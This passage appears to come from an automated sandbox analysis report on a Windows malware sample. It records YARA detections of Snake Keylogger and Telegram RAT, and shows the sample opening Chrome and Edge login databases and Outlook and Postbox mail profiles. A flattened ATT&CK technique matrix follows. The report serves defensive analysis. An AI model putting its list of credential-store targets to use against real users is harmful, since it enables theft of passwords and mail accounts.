          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.4166196575.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.4166196575.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 2828, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTR
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.4166196575.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.4166196575.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 2828, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTR
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          DLL Side-Loading          		111
          Process Injection          		1
          Masquerading          		1
          OS Credential Dumping          		1
          Query Registry          		Remote Services1
          Email Collection          		1
          Web Service          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Disable or Modify Tools          		LSASS Memory1
          Security Software Discovery          		Remote Desktop Protocol11
          Archive Collected Data          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager1
          Process Discovery          		SMB/Windows Admin Shares1
          Data from Local System          		1
          Ingress Tool Transfer          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
          Process Injection          		NTDS31
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Obfuscated Files or Information          		Cached Domain Credentials1
          System Network Configuration Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Software Packing          		DCSync13
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Timestomp          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          DLL Side-Loading          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.